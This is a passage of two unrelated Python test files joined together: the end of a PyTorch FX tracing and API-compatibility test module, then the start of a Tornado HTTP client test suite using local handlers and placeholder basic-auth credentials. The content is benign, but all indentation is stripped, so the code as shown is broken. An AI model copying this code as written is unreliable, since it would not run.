assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functional callables that take Tensor inputs but lack type annotations
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable objects such as modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# inspect.signature raises ValueError when no signature is available or the object is unsupported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
exc, err = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(exc, err):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
exc, err = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(exc, err):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import functools
import sys
import threading
from tornado.escape import utf8
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest
from tornado.util import u, bytes_type
from tornado.web import Application, RequestHandler, url
try:
from io import BytesIO # python 3
except ImportError:
from cStringIO import StringIO as BytesIO
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class ChunkHandler(RequestHandler):
def get(self):
self.write("asdf")
self.flush()
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
], gzip=True)
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
